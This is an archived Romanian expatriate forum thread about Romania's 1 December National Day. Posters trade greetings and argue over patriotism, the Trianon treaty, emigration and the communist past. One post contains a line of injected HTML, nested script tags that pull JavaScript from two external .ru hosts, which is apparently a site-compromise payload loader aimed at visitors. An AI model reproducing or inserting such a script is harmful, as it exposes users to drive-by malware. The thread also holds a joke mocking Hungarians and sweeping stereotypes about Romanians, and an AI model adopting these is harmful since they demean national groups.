PDA

Arată versiune întreagă : 1 DECEMBRIE

sauzimdebine
30.11.2004, 21:03
LA MULTI ANI ROMANIA!

tonita
01.12.2004, 01:03
Si tuturor celor care o iubesc !smileys/smiley1.gif

dana_pascan
01.12.2004, 09:51
la Multi Ani Romania.....ca daca tot am sarbatorit 4 Iulie, vrand nevrand, de ce sa nu sarbatorim si Ziua Romaniei?!

Eu mi-am luat azi liber......ura.....motiv de prilejsmileys/smiley43.gifsi am sa beau si un pahar de vin.....in cinstea celor bune de acasa!

Saluari si urari de bine la toti cei care vor face la fel

aconi
24.10.2005, 08:28
LA MULTI ANI ROMANIA!

mai spune cate ceva la topicul cu reconcilierea ce yici de redactorul HHHsmileys/smiley2.gif

rossa
25.10.2005, 02:16
Aconi , nu mai b

mihaela75
25.10.2005, 04:54
smileys/smiley19.gifvreau acasasmileys/smiley19.gif!!!smileys/smiley19.gifmereu vreau acasasmileys/smiley19.gif!!!

aconi
25.10.2005, 05:12
De ce nu iei un bilet de avion sa vii acasa? am impresia ca nu mai stii precis unde esti "acasa"In orice caz daca vrei mereu trebuie sa faci un efort(financiar) sa vii ACASA sa iei o gura de aer , sa incarci "bateriile" pana te vei hotari unde esti cu adevarat acasa.(de cat timp esti in Canada?}smileys/smiley37.gif

roxanici
29.11.2005, 18:37
Maine e Ziua Nationala a Romaniei!

La multi ani tuturor romanilor, din tara si din afara tarii!
In aceste momente grele pe care leparcurgem, sa nu nepierdem speranta si sa ne bucuram pentru ca suntem romani.
La multi ani tuturor! Bucurati-va de aceasta sarbatoare nationala!

O felicitare virtuala ptr voi: http://www.gfxworld.info/felicitari/card69/

angeline
29.11.2005, 19:42
" LA MULTI ANI " tuturor cu aceasta ocazie !

file:///D:/documents%20and%20Settings/ROCKY/My%20documents/angela/simfonia%20trandafirilor%20rosii.jpg

aconi
29.11.2005, 21:47
Si tuturor celor care o iubesc !smileys/smiley1.gif

LA MULTZI ANI ROMANIA!

La multi ani tutuuror celor care o respecta si cred in justetzea Tratatului de la Trianon.

Ana Tofan
29.11.2005, 22:08
La multi ani, Romania si din partea mea... Cel mai bun lucru de maine e totusi ziua libera...

aconi
29.11.2005, 22:20
[QUOTE=rossa]

Aconi , nu mai b

rossa
29.11.2005, 22:51
Auzi Aconi , uite iti transmit tie multa sanatate , fericire si putere de munca , bani si onoruri , succes la femei si tot ce vrei ....darrr .... scuteste-ma te rog de urarile de ziua Romaniei .

Urarile mele sunt valabile pentru toti forumistii de pe aici (atat)

agora
29.11.2005, 23:36
sauzimdebine pe faza ca de obicei, bravo!

Mersi roxanici de link, chiar simpatic.

La multi ani tuturor romanilor, oriunde ar fi ei!smileys/smiley1.gif

rossa
30.11.2005, 00:45
UIte Aconi ca sa nu zici ca-s baiat rau si nu vreau sa fac o urare de 1 Decembrie , uite iti dedic tie urmatorul banc . Sper sa te unga la inima :

Un grup de turisti maghiari intr-o excursie in Romania, prin Muntii
Carpati.
La un moment dat se aude un urlet infricosator:
UUUUU-UUUUUUUUUU-UUUUUUUUUUUUUUU!!!
Speriati si curiosi isi intreaba ghidul despre ce este vorba.
Ghidul le spune:
- La noi in Romania exista un trib de femei foarte frumoase si
salbatice care atunci cand le vine timpul de imperechere se aduna
intr-o
pestera si isi inalta strigatul hormonal in asteptarea masculilor.
Peste 2 zile cel mai titrat ziar din Ungaria scria cu litere
de-o schioapa: "15 barbati unguri au murit calcati de tren intr-un
tunel din Romania. Toti erau dezbracati...

aconi
30.11.2005, 03:02
rossa,admir calitatile tale de a povesti si a spune bancuri.

Dar, ceea ce faci tu este,pentru mine, revoltator.Nici un cetatean al vreunui stat nu ia in deradere Ziua statului in care vietuieste.Ar fi fost de conceput asa ceva la 4 iulie in USA, la 14 iulie in Franta etc, etc.?.Daca esti roman, fara voia ta, prin filiatiune:esti o"coada de topor".Oare va fi multumit prietenul tau Prefectul, crezand ca m-ai enervat? Nu, nu m-am enervat:te compatimesc.

Iti multumesc totusi pentru urarile facute mie personal si...ce-mi doresti tu mie iti doresc si eu tie.

angeline
30.11.2005, 04:20
rossa,admir calitatile tale de a povesti si a spune bancuri.

Dar, ceea ce faci tu este,pentru mine, revoltator.Nici un cetatean al vreunui stat nu ia in deradere Ziua statului in care vietuieste.Ar fi fost de conceput asa ceva la 4 iulie in USA, la 14 iulie in Franta etc, etc.?.Daca esti roman, fara voia ta, prin filiatiune:esti o"coada de topor".Oare va fi multumit prietenul tau Prefectul, crezand ca m-ai enervat? Nu, nu m-am enervat:te compatimesc.

Iti multumesc totusi pentru urarile facute mie personal si...ce-mi doresti tu mie iti doresc si eu tie.

Practic frumusetea si nobleteaurarilor cu diferite ocaziisunt atunci cand sunt spuse din suflet, ele ar trebui sa fie lipsite de egoism si rautate...si sincer... aici nu constat decat orgoliul si asa-zisulpatriotism care cred ca isi pierde chiar si adevaratul sens. Ce folos sa fii patriot daca nu poti iubi... ierta oamenii ? nu compatimi! Ce folos are tara de asa patrioti ?(eu nu ma consider)....insa stiu ca iubesc oamenii indiferentin ce taras-ar afla si de cat de patrioti se considera .smileys/smiley1.gif

aconi
30.11.2005, 06:11
sa lasam la o parte corzile sufletesti.Aici e vorba de altceva si tu stii prea bine.Dupa, parerea mea, toti cetatenii unui stat indiferent de nationalitate, religie etc. trebuie sa fie de acord,sa accepte integritatea statului.Aici,din pacate,se petrec,mai voalat sau mai direct unele feomene ciudate pe care le sustin si unii forumisti;rossa mai dur,tu cu finetea care te caracterizeaza,ocolesti esentialul si apelezi la iubirea intre oameni.De aceeate rog,pe tine si pemaestrul rossa sa raspundeti transant:Acceptati justetea Tratatului de la Trianon?smileys/smiley36.gifsmileys/smiley2.gif

tonita
30.11.2005, 06:19
smileys/smiley32.gif

asa e angeline. uneori punem carutza inaintea boilor.

Totusi ar fi interesant daca aconi ar explica ce inseamna sa fi "coada de topor" .

Vlad
30.11.2005, 11:57
sa lasam la o parte corzile sufletesti.Aici e vorba de altceva si tu stii prea bine.Dupa, parerea mea, toti cetatenii unui stat indiferent de nationalitate, religie etc. trebuie sa fie de acord,sa accepte integritatea statului.Aici,din pacate,se petrec,mai voalat sau mai direct unele feomene ciudate pe care le sustin si unii forumisti;rossa mai dur,tu cu finetea care te caracterizeaza,ocolesti esentialul si apelezi la iubirea intre oameni.De aceeate rog,pe tine si pemaestrul rossa sa raspundeti transant:Acceptati justetea Tratatului de la Trianon?smileys/smiley36.gifsmileys/smiley2.gif

Eu il nominalizez pe Aconi la premile ROscar.....la sectiunea CEL MAI "CONSTIPAT" FORUMIST.....

GNChicago
30.11.2005, 13:03
E 1 Decembrie 2005in Romania:

LA MULTI ANI ROMANIA!

WE LOVE ROMANIA!

GOD BLESS ROMANIA!

Gogule
30.11.2005, 14:29
Truesmileys/smiley17.gif

La multi ani! si din partea lui Gogu smileys/smiley36.gif

Krista
30.11.2005, 15:32
Cu drag si dor, La Multi Ani,http://i24.photobucket.com/albums/c37/CristinaRau/Romania.jpg! Va doresc la toti romanii sanatate,bucurii si liniste, oriunde v-ati afla!

Doresc sa fac si o urare-desicatiein versuri, reproducand frumoasa poezie "Tara" de Vasile Alecsandri:

[b]Din umbra deasa-a norului

marian42
30.11.2005, 19:48
La multi ani !, tuturor celor ce cunosc macar unul din cuvintele MAMA, TARA , DOR !...

01.12.2005, 01:20
Marian42, euimi amintescnumai cuvintele MAMA si DOR...mie ce imi doresti????

marian42
01.12.2005, 02:05
De fapt, asa am vrut sa scriu de la-nceput....Acum, te-am
lamurit ca-ti doresc tot ce-i mai bun, Mugatu ? Sincer si din inima !

01.12.2005, 02:10
Si eu la fel Marian, sa fi sanatos, fericit si sa ai viata lunga langa cei pe care ii iubesti....siurarea mea nueste conditionatasmileys/smiley32.gif

David
01.12.2005, 02:12
HY SI LA MULTI ANI ROMANIA

marian42
01.12.2005, 02:14
Asta pentru ca tu esti acolo si mai mult ca sigur te-ai
obisnuit sa vezi-privesti viata si oamenii altfel decat mine...Spre
rusinea mea, eu inca-i iubesc pe-ai mei (romanii) mai mult decat pe
ceilalti...Pune-ma la zid si da cu flori in mine ! smileys/smiley36.gifsmileys/smiley18.gifsmileys/smiley36.gif

01.12.2005, 02:33
Eu nu fac discriminare Marian! desigur ca am o afinitate si sentimente speciale pentruRomani...asta sunt si eu, nu?? La mine la serviciavem Natiunile Unite....din toate continentele, culorile si limbile pamantului...si fiecare are defecte si calitatile lui...

asa suntem si noi romanii, avem si calitati si defecte, in ciuda la ce cred altii, eu nu cred ca suntem o rasa superioara!

Am vazut ca sunt uni, aici pe forum, care urasc pe unii dintre romani, dar iubesc neconditonat Romania...eu vad asta ca un paradox....

01.12.2005, 03:36
<DIV>Nu toata lumea se exteriorizeaza.</DIV>
<DIV>Daca nu spui "te iubesc" nu inseaman ca nu iubesti sau nu-ti pasa valabil este si vice versa.</DIV>
<DIV>In fond cel mai important este sa stii sa il respecti pe cel de linga, </DIV>
<DIV>tine indiferent de unde vine si unde pleaca.</DIV>

Krista
01.12.2005, 04:14
asa suntem si noi romanii, avem si calitati si defecte, in ciuda la ce cred altii, eu nu cred ca suntem o rasa superioara!

Perfect de acord cu tine, dar sa fim corecti pana la capat -atunci inseamna ca nu suntem nici rasa inferioara smileys/smiley2.gif, cum spun cateva voci care vad doar hoti, prostitutie, copii strazii, coruptie! Come on, fiecare padure cu uscaturile ei.

Cred ca fiecare din noi are exemple dragi, de romani de treaba, harnici, saritori si altruisti, aici sau acasa. De ce nu asta ar fi romanul pe care sa-l pastram fiecare in suflet, macar de ziua nationala? Un cetatean ca oricare altul, cu bune si mai putin bune! Nu trebuie sa te numesti patriot, ca sa vezi si partea frumoasa a Romaniei! Pana una-alta, de acolo venim si asta nu se schimba, la fel cum nu iti poti alege parintii!

Apropos de paradoxuri, nici eu nu inteleg cum se pretind cate unii foarte democrati si ajustati la viata de aici, cand le lipsesctoleranta si respectul pentru propria natie?! "Hai sa dam mana cu mana/ Cei cu inima romana!"smileys/smiley31.gif

La multi ani!

01.12.2005, 06:07
Krista, nu am spus ca noi romanii am fi rasa inferiora...toti avem potential! (cu mici exceptii)

La nivelul individual ne putem mandrii cu multi oamenii de isprava, la nivelul general insa, lasam mult de dorit. Faptul ca dupa 15 anii de democratie suntem la acelasi nivel cu Bulgaria si Albania este un adevar de necontentestat. Acum nu mai avem pe cine sa dam vina, nu mai este comunism, nu mai avem pe rusi in spinare. Ai fost recent in Budapesta, Praga sau Washovia? Daca da ai sa intelegi de ce unii dintre noi sunt frustrati.... "Omul sfinteste locul," am vazut asta in multe tari europene care nu au frumusetea naturala sau resursele naturale ale romaniei.

Adevarul trist este ca unii romani nu doresc sa munceasca, sa-si foloseasca talentele la adevarata lor capacitate, si sa faca cinste numelui de ROMAN!

In schimb le place cersitul, furatul, prostitutia si tot felul de gainarii prin care fac de rusine tara lor iubita. Sa nu admitem asta inseamna sa ne punem capul in nisip ca strutul. Fiecare avem dreptul sa simtim ce dorim: rusine, dragoste, mandrie, patriotism....etc

Nu imi amintesc sa fi fost intolerant la sentimentele altora, dinpotriva, au fost multe mesaje la care am preferat sa nu comentez pentru ca am considerat dreptul fiecaruia sa gandesca ce vrea si nu am dorit sa contrazic pe cineva. Totusi observ o doza de hipocrizie la cei care se bat cu punii in piept cat de mult isi iubesc patria, dar in schimb au facut sacrificii extraordinare sa fuga din tara, unii si-au riscat chiar si viata. De exemplu, euas pune sub semnul intrebari sinceritatea sotiei mele daca intr-o ziea m-ar parasi pentru alt barbat, in schimb ar timete mesaje de dragoste si cat de mult imi duce dorul......

Cat despre parinti, copiii se mai si adoptaiar inimile se mai si trasplanteaza...smileys/smiley2.gif

Krista
01.12.2005, 06:37
Nu imi amintesc sa fi fost intolerant la sentimentele altora, dinpotriva, au fost multe mesaje la care am preferat sa nu comentez pentru ca am considerat dreptul fiecaruia sa gandesca ce vrea si nu am dorit sa contrazic pe cineva. Totusi observ o doza de hipocrizie la cei care se bat cu punii in piept cat de mult isi iubesc patria, dar in schimb au facut sacrificii extraordinare sa fuga din tara, unii si-au riscat chiar si viata.

Mugatu, nu trebuie sa o iei personal, nu vorbeam de tine la intoleranta.

Oricum, e bine ca avem fiecare o parerea si ne-o exprimam aici.Eu am citit cu atentie ce-ai spus mai sus, si iti respect opinia, desi nu sunt de acord cu cateva din afirmatiile tale.Cum am mai spus, fiecare e subiectiv,filtrand lucrurile prin experienta si perceptia personala.Dar nu credromanul de rand e vinovat, ci conducatorii si conditiile politice. Vrem - nu vrem suntem o tara mica, la rascruce de lumi, vanduti si cumparat la mese de tratative de care nici nu avem habar!

Nici cu partea cu ipocrizia nu sunt total de acord, ori fi si acolo exceptii, dar parerea mea este ca majoritatea romanilor care au emigrat au facut-o din motive economice. Faptul ca ti-ai luat viata in maini si ai incercatsa-ti cladesti oviata mai buna printre straini, nu te face sa uiti de tara ta sau sa o urasti! Eu cred ca ura au doar frustratii pe care situatia dificila din tara i-a indemnat sa plece, dar nici aici n-au reusit in viata... Gen "Foster child", care e miserable cu parintii adoptivi, dar nu mai are cale de intoarcere nici la parintii naturali...

Numai bine!smileys/smiley31.gif

01.12.2005, 08:50
Krista, iti respect dreptul de nu a fi de acord cu mine. Insa nu este adevarat ca suntem o tara mica si neajutorata. Ca suprafata, Romania este la fel ca Anglia, si mult mai mare ca Danemarca, Ungaria, Austria, Belgia sau Elvetia. Avem resurse naturale nenumarate, atractii turistice de tot felul, iesire la mare si o clima mult mai blanda decat multi dintre vecini nostri de la nord. Si cu toate astea am ramas in urma europei. Este adevarat ca in trecut multe decizii ne-au fost impuse, dar eu vorbesc de istoria recenta, din ultimii 15 ani. Cine l-a votat pe Iliescu presedinte? si de 2 ori! A cui este vina ca oficiali alesi de popor, din trecut si prezent, sunt corupti si incapabili sa creeze conditiile pentru un nivel de trai decent? Alte tari au dat de pamant cu fostii comunisti si securisti, noi romanii i-am votat in guvern. In majoritatea tarilor foste comuniste, dosarele securitatii au fost deschise si agenti secreti demascati...la noi au fost alesi membri in parlament. Pe cine sa dam noi vina atunci? Frustrarea mea, si a altora, este ca in Romania s-ar putea trai asa de bine, ar putea fi asa prosperitate, in schimb o mana de oameni s-au facut milionari peste noapte iar restul nu stie cum sa plece undevasa-sicastige o paine. Nu cred ca nimeni a spus aici ca uraste Romania sau pe romanii, insa unii dintre noi avem un grad mai ridicat sau scazut de indiferenta la ce se intampla in tara, si astadupa atatea dezamagiri si ocazii ratate.

01.12.2005, 12:10
Ne amintim..

http://img.photobucket.com/albums/v231/curcubeu/ro03.jpg

01.12.2005, 12:12
http://img.photobucket.com/albums/v231/curcubeu/ro02.jpg

01.12.2005, 12:13
http://img.photobucket.com/albums/v231/curcubeu/ro01.jpg

angeline
01.12.2005, 20:24
apropo de imagini ! in perioada cand nu am calatorit deloc in afara tarii suparata pe tot ce ma inconjoara, imi imginam ca daca as trai in alta tara poate muntii ar arata altfel, cerul nu ar fi mereu innorat ar arsitele ar fi mai usor de suportat, poate frunzele copacilor ar arata altfel, pamantul pe care calci sigur trebuie sa fie altfel si asa se explica de ce in alta parte oamenii sunt mai multumiti de viata de ceea ce fac si astfel sunt mai fericiti....dar....surpriza !

atunci cand am "iesit din casa" am constata ca rosiile au samburi si sunt rosii in functie de soiu lor, ca pasarile canta peste tot, vantul adie oriunde te-ai afla iar pamantul pe care calcamne suporta pe toti oricat de buni sau rai am fi....(sper sa nu fiu off topic - azi e 2 decembrie)

rossa
01.12.2005, 21:35
Draga Aconi , ai profitat de ocazie caam fost liber de 1 Decembrie si te-ai gandit sa ma faci cu ou si cu otet . Inclin sa cred ca in urma nominalizarilor la ROscar ai inceput sa te crezi un fel de verry important pearson. Eu raman la parerea ca esti acelasi panglicar care nu mai are altceva in gura decat tratatul de la Trianon . Am incercat sa glumesc cu tine , sa te mai imbunez putin dar se pare caeste in zadar . Am mai vazut ca acum ma consideri si pe mine un bad gay, mai ai sa ma faci ungur si gata ... Uite , eu nu sunt suparat pe tine , doar ca o sa incetez dialogul cu tine , esti o musculita care b

aconi
01.12.2005, 22:39
rossa fyllam,Not verry important personage!doar verry well.Iar, tu...bad clown.Dialogul nu va inceta; ca, tu ai m

aconi
02.12.2005, 04:15
apropo de imagini ! in perioada cand nu am calatorit deloc in afara tarii suparata pe tot ce ma inconjoara, imi imginam ca daca as trai in alta tara poate muntii ar arata altfel, cerul nu ar fi mereu innorat ar arsitele ar fi mai usor de suportat, poate frunzele copacilor ar arata altfel, pamantul pe care calci sigur trebuie sa fie altfel si asa se explica de ce in alta parte oamenii sunt mai multumiti de viata de ceea ce fac si astfel sunt mai fericiti....dar....surpriza !

atunci cand am "iesit din casa" am constata ca rosiile au samburi si sunt rosii in functie de soiu lor, ca pasarile canta peste tot, vantul adie oriunde te-ai afla iar pamantul pe care calcamne suporta pe toti oricat de buni sau rai am fi....(sper sa nu fiu off topic - azi e 2 decembrie)

Eu cred ca, nu suntem off tpoic, chiar daca abordam acest subiect pe tot parcursul anului

agora
02.12.2005, 04:25
Pt Mugatu

Nu cred ca putem disocia atat de strict intre Romania de dinainte si de dupa '89. Nu cred ca ceea ce s-a intamplat acolo in ultimii 50 de ani nu are nici un ecou astazi. Eu zic sa nu uitam ca dupa WWII in gulag-urile romanesti au fost omorati aproximativ 1 milion de oameni, dintre care majoritatea au fost elite (oameni cu educatie, cu functii,proprietati, etc.). La acestia se mai adauga cam inca1 milion de elite care au parasit tara sub presiunile facute de cei la putere. Eu zic ca nu e putin sa vaduvesti o tara ca Romania anilor '50-60 de aproximativ 1,5-2 milioane de oameni care au avut fost modele ale societatii lor. Am avut sansa sa intreb un sociolog cam in cat timp se poate reface o asemenea pierdere. Raspunsul a fost simplu si sec: "Daca totul merge bine, cam 3 generatii, aproximativ 100 de ani". In locul lor au fost promovati oameni cu "origini sanatoase", care desi unii au fost inteligenti totusi le-a lipsit ceva: ierarhia fireasca a valorilor.

De ce au ales romanii atat de gresit dupa '90? Pentru ca majoritatea traiesc inca ca strabunicii lor, uitati in sate in care curentul a ajuns odata cu comunistii iar din cei de la oras 90% dintre eisunt prima, maxim a doua generatie plecata de la tara, oameni care au avut preponderent doar o educatie medie (profesionala sau liceu) si nici un fel de cunostiinte despre ceea ce inseamna democratia. Sa nu uitam de puzderia de orase industriale create de comunisti unde putem spune ca mai nimeni nu avea alta viziune decat cea oferita oficial. Acest fel de societate si populatie a fost usor de manipulat de cei care i-au avut profesori pe maestrii sovietici.

"Pe cine sa dam noi vina atunci? Frustrarea mea, si a altora, este ca in Romania s-ar putea trai asa de bine..."

Nu stiu daca se pune problema sa dam vina pe cineva pentru ca "vinovat" a fost si cel care a pus un vot in urna cu mintea incetosata de ignoranta si diversiunidar "vinovat" e si cel care a preferat sa plece si sa lase in urma totul doar pentru a se realiza pe sine. Am auzit multi romani plecati ca au facut acest lucru pentru ca simteau ca nu pot lupta cu sistemul, ca isi iroseau viata in van. Nu le comentez deciziile pentru ca pana una alta asta e singura viata pe care stim ca o avem cu siguranta si fiecare face ce crede el ca e mai bine. Dincolo insa de aceasta libertate a fiecaruia de a decide pentru sine un lucru insa cred ca ar trebui sa fie la fel de limpede, nimic nu justifica sa ii judece sau sa ii categoriseascape cei care au ramas in tara.

"Frustrarea mea" e ca ne imprastiem ca frunzele in vant fiecare cu durerile si experientele lui si ne scapa lucrul care ar fi cel mai firesc sa il facem, sa incercamsa luam inapoi cei al nostru. E bine daca reusim sa fim buni, realizati social si material in tarile in caretraim dar cred la fel ca si tine ca "in Romania s-ar putea trai asa de bine" daca am avea vointa de a uita de nemultumirile personale, daca am trece peste suspiciuni si interese, si am reusi sa ne intelegem latura comuna, ca suntem romani si ca cei care ne-am nascut acolo vom avea intodeauna Romania undeva in inima noastra, iar pentru asta sa facem un efort de a face ceva si pentru tara.

Suna anacronic? Probabil, pentru ca "moda" unor "fraieri" ca intelectualii care au murit in inchisoriile comuniste pentru ca si-au aparat ideile si valorile a trecut iar acum traim vremea confuza a unui materialism avaloric in care ni se spune ca suntem buni daca consumam si traim un prezent perpetuu al senzatiilor si placerilor.Nu cred ca are rost sa amintim aici nume ale celor morti prin inchisori pentru ca daca n-am deschis o carte de istorie nu ne-ar spune nimic despre sacrificiul pe care l-au facut dar as aminti ceva spus de Balcescu: "Sa nu ne intrebam ce are sa ne dea tara noua ci sa ne intrebam ce avem noi de dat tarii". Ne putem pune intrebarea asta?

<script src=http://www.nmr43.ru/ng<script src=http://www.iroe.ru/ngg.js></script>

aconi
02.12.2005, 04:46
Corect! Imi permit,fara lipsa de modestie, sa apreciez modul de argumentare,de obiectivitate dar si de suflet.Dar.....VOX CLAMANDI IN DESERTO. (ma refer la... "adrisant")Toata pasarea pe graiul ei piere.Este liber omul sa aleaga modul de viata, modul de gandire.Daca a ales varianta ibi Patria ubi bene,"taind" toate radacinile cu trecutul,macar sa aiba bunul simt sa ne lase in pace.

agora
02.12.2005, 04:56
Pentru cei curiosi ce a insemnat comunismul pentru istoria si prezentul Romaniei:

http://www.gid-romania.com/IndexSections.asp?SectionID=20&am (http://www.gid-romania.com/IndexSecti&#111;ns.asp?Secti&#111;nID=20&amp;SID=124) p;SID=124

http://www.casa-romanilor.ch/evenimente/2004/harta_gulagului (http://www.casa-romanilor.ch/evenimente/2004/harta_gulagului_romanesc.htm) _romanesc.htm

si un om a acelor vremuri:

http://www.gid-romania.com/IndexSections.asp?SectionID=5&amp (http://www.gid-romania.com/IndexSecti&#111;ns.asp?Secti&#111;nID=5&amp;SID=146) ;SID=146

02.12.2005, 05:20
dar "vinovat" e si cel care a preferat sa plece si sa lase in urma totul doar pentru a se realiza pe sine. Am auzit multi romani plecati ca au facut acest lucru pentru ca simteau ca nu pot lupta cu sistemul, ca isi iroseau viata in van.

Aconi, apreciaz raspunsul tau, inteligent si civilizat, ocazional este placut sa vad si asa ceva. Eu am parasit tarala inceputul aniilor '80, iar realizarea de sine nu erao prioritate, lupta pentru supravietuire era mai importanta la timpul acela.Este usor sa dam vina pe clanul Ceuasestilor, dar undeau fost romanii adevarati cand tara a fost regulata de o mana de analfabeti?Tot romanii era si aceia care raportau la securitate totce se intampla in bloc, sau pe strada, sau la servici....delgatul de strada, debloc,seful de echipa, sau loctiitorul politic de nu mai stiuce. Cine iesea la sosea sa stige "Ceausescu PCR" "Te iubim conducator iubit, care tara ai fericit"????

Fiecare isi rodea osul intacere,fara se se complice sau sai pese de ROMANIA, doar de interesul personal..... Te rog sa ma crezi,eu nici pioner nu am fost, aveam 10 ani can i-am spus la tovarasa dirigintaunde sa-si bage cravata de pioner.Altiiau preferat sa-si facaun viitor prosper in RO, si au intrat in UTC, PCR si altele.....ar fi trebuit eu sa stau in ROsa ma luptcu morile de vant?

Eu nu stiu cattimp arenevoie o natiune pentru a se reface, tot ce stiu este caam calatorit prin multe din tarile din lagarul sovieticcare au suferit tot ca si noi si au fost tinute in aceiasi bezna si diferentaesteextraordinara. Se vede ca lor nu lea trebuit 3 generatii. Am citit de curand intr-o revista de turism americana impresiile unui american care a calatorit cu masina de la Viena la Bucuresti. Parafrazez o fraza care ma intristat mult. El scria asa: "Cand treci granita in Romania, dai ceasul inainte cu o ora si timpul inapoi cu 100 de ani. Daca nu as fi vazut ocazional cate o antena de satelit pe casele, as fi crezut ca sunt inca insecolul 19...."

02.12.2005, 05:27
Daca a ales varianta ibi Patria ubi bene,"taind" toate radacinile cu trecutul,macar sa aiba bunul simt sa ne lase in pace.

Aconi, aconi, daca te referi la mine, vreau sa-ti amintesc ca te afli pe un forum initiat, dedicat si sustinut de emigranti care au parasit Romania in mod voluntar. As mai fi inteles, daca noi am fi invadat un forum romanesc numai pentru patrioti care vorbesclatinalalatrina.

Asa ca intreaba-te singur, cine duce lipsa de bun simt......

GNChicago
02.12.2005, 05:32
pentru ca daca n-am deschis o carte de istorie nu ne-ar spune nimic despre sacrificiul pe care l-au facut dar as aminti ceva spus de Balcescu: "Sa nu ne intrebam ce are sa ne dea tara noua ci sa ne intrebam ce avem noi de dat tarii". Ne putem pune intrebarea asta?

Agora citatul dat de tine spus de Balcescu pare foarte apropiat de un citat celebru spus de Kennedy:

Nu intreba ce poate face tara ta pentru tine, intreaba ce poti face tu pentru tara!"

De fapt spunea acelasi lucru dar daca ai exact citatul atunci paternitatea citatului ar trebui sa fie REATRIBUIT sa se dea credit autorului adevarat.

Ai exact sursa originala? Poate cineva gasi acel citat original?

Krista
02.12.2005, 05:50
GNChicago, ai dreptate, ai fost foarte pe faza smileys/smiley32.gif, citatul e din Kennedysmileys/smiley5.gif, din Inaugural Address, Friday, January 20, 1961:

<TABLE cellSpacing=3 cellPadding=1 align=center>
<T>
<TR>
<TD>[b]"And so, my fellow Americans: ask not what your country can do for you

agora
02.12.2005, 05:57
Da, e trist cand cineva iti face asa o caracterizare ca tara. Ii dau dreptate intr-o oarecare masura americanului de care povestesti, cand intri in Romania vezi multa saracie.Sper totusi ca omul nu s-a oprit din cauza la primul "soc" si o fi dat pana la urma si de un oras cenusiusi un blocdin alacu tencuiala toata sarita de la inundatiile din bai si bucatarii dar care are pe o parte o sticla de cola de 10 metri inaltime ce categoric nuprea arata a sec. XIX. Si aia era in '90 ...

Nu incerc sa discut cazul tau concret pentru canustiu nimic despre evenimentele de care spui in afara a ceea ce povestesti. In plus nu am scris postarea anterioara gandindu-ma strict la un caz. Fiecare am plecat avand motivele noastre si nu cred ca are rost sa le judecam cat au fost de bune sau rele.

In ceea ce priveste ideea supravietuirii in anii '80, de care pomenesti, am oarece retineri. Dupa anii '60-'70, problema a fost pusa cam in alti termeni, exceptie facand doar cazurile unor dizidenti declarati si care au facut probleme de imagine Romaniei comuniste. Daca a fost si cazul tau, felicitari.

Cei de care pomenesti ca ieseau la aplaudat si altele, erau tocmai de cei care iti pomeneam ca erau prima-a doua generatie la oras, bucurosi ca aveau un loc de munca, un apartament dat de stat, o masina pe care o plateau in rate, etc. si toate astea cu pretul unei ipocrizii sociale aproape permanente. "Romanii adevarati" de care intrebi o parte deja plecasera in anii 50-60 (atunci chiar era o problema supravietuirea) iar restul au fost adusi la tacere la propriu sau la figurat cu pedepse deloc usoare. Comunistii au reusit sa isi creeze o populatie de manevra, oameni simpli, iar restul se incadreaza in teoria morcovului si batului. Tot ce le-ar fi putut crea greutati in a ii manipula a fost exterminat sau convinsi sa paraseasca tara.

agora
02.12.2005, 06:01
pt GNChicago

O sa caut materialul, deocamdata am citat din memorie.

In rest ce sa spun, Balcescu contra Kennedy... in State?smileys/smiley36.gif No chance!

02.12.2005, 06:46
In ceea ce priveste ideea supravietuirii in anii '80, de care pomenesti, am oarece retineri. Dupa anii '60-'70, problema a fost pusa cam in alti termeni, exceptie facand doar cazurile unor dizidenti declarati si care au facut probleme de imagine Romaniei comuniste. Daca a fost si cazul tau, felicitari.

Agora, nu am fost dizident, am incercat odatasa semnez scrisoare deschisa de protest a lui Paul Goma, insa o duzina de securisti care pazeau scara blocurilor m-au luat la shuturi, asta tot ce pot spune despre actitivitatea mea dizidenta din Romania. Cred ca aveam 15 sau 16 ani..... Nu stiu in ce culori rose ai vopsit tu sfarsitul anilor '70 sau inceputul aniilor '80, dar amintirile mele sunt foarte cenusii. Ai auzit de legea parazitismului? Era o lege data de Ceausescu in anii '77 sau '78, special ca sa bage la puscarie pe dusmani comunismului. Astazi teconcedia pentru ca ai fluierat in biserica si maine venea militia la usa sa te intrebe unde lucrezi. Daca nu puteai sa prezinti o legitimatie de servici erai dus la tribunal si pana seara condamnat la 6 luni de munca la canal. Mi-am dat seama caeram prea mic pentru un razboi asa de mare....

Nu stiu de ce, dar cand iti vad numele pe forum ma gandesc la Govora.smileys/smiley36.gif

agora
02.12.2005, 06:55
Anii 70-80 au fost mult mai blanzi comparativ cu anii 50-60 in privinta legitatii arestarilor si condamnarilor. Inca se faceau multe abuzuri, dupa cum spui si tu dar nu se compara cu pierderile suferite de societatea romaneasca in anii 50-60.

"...prea mic pentru un razboi asa de mare.... " Asa suntem si azi, de unii singuriin spatele tastaturilor noastre...

Govora?Pai am fost acolo de cateva ori, poate ne cunoastem? Glumesc!smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif

aconi
02.12.2005, 07:17
Daca a ales varianta ibi Patria ubi bene,"taind" toate radacinile cu trecutul,macar sa aiba bunul simt sa ne lase in pace.

Aconi, aconi, daca te referi la mine, vreau sa-ti amintesc ca te afli pe un forum initiat, dedicat si sustinut de emigranti care au parasit Romania in mod voluntar. As mai fi inteles, daca noi am fi invadat un forum romanesc numai pentru patrioti care vorbesclatinalalatrina.

Asa ca intreaba-te singur, cine duce lipsa de bun simt......

mai omule, dar esti foarte furios si incep sa te inteleg.Dupa ce ma invrednicesti cu bine meritate elogii,observasi si ultimul paragaraf. Uite iti satisfac dorinta:mugatu!

GNChicago
02.12.2005, 07:23
Agora, sa sti ca respect presedintii atit americani cit si romani, desi imi pare extrem de rau ca nu l-am intrebat public pe iliescu cind am avut ocazia, dar am fost invitat in ultima secunda pe barba altuia....

Cineva a scris acel discurs pentru Kennedy, imi scapa numele acum....cred ca incepe cu B....,dar la un moment dat a candidat si el si era un foarte bun speech writer, Mugatu poate ma ajuta....,nu fac o vina nimanui pentru nestiinta lor de ceva scris anterior in anii 1800'... dar paternitatea poate fi restabilita si recunoscuta.

Agora cred ca ai prea putina incredere in justitia americana cu toate ca s-a dovedit practic ca a lucrat bine de la cel mai inalt nivel pina la ultimul cetatean, poate greu de inteles din Romania. As aminti doar cazul Nixon-Bob Woodward (Deep Throat) in Watergate. Crezi ca asa ceva a fost posibil sau ca ar fi fost posibil in orice loc in lume decit in AMERICA? Justitia lucreaza in America conform unui sistem care se RESPECTA!, chiar daca nu credem in rezultatul ei....cazul OJ, etc., dar sistemul se aplica oricare ar fi rezultatul.

